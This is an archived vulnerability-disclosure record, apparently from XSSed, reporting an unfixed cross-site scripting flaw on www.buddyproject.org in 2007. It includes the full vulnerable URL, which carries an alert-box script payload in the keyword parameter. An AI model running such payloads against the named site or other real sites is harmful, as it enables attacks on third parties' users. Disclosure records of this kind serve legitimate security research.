Unfixed XSS vulnerability at www.buddyproject.org

2007-02-07T00:00:00
ID XSSED:11401
Type xssed
Reporter CoNqUeRoR
Modified 2007-03-07T00:00:00

Description

Security researcher CoNqUeRoR, has submitted on 02/07/2007 a cross-site-scripting (XSS) vulnerability affecting www.buddyproject.org, which at the time of submission ranked 1078061 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/07/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.buddyproject.org/capers/default.asp?type=advanced&txtgrade=&txttopic=&keyword="<script>alert("HACKED")</script>&btnSubmit.x=0&btnSubmit.y=0&grade=&topicx=Computer+Drawing&topicx=Database&topicx=Fall+Holidays&topicx=Family+Involvement&topicx=Fine+Arts&topicx=Language+Arts&topicx=Mathematics&topicx=Multi-media&topicx=Patriotism&topicx=Science&topicx=Social+Studies&topicx=Spreadsheet%2FGraphs&topicx=Spring+Holidays&topicx=Summer+Holidays&topicx=Winter+Holidays&topicx=Word+Processing&norecs=True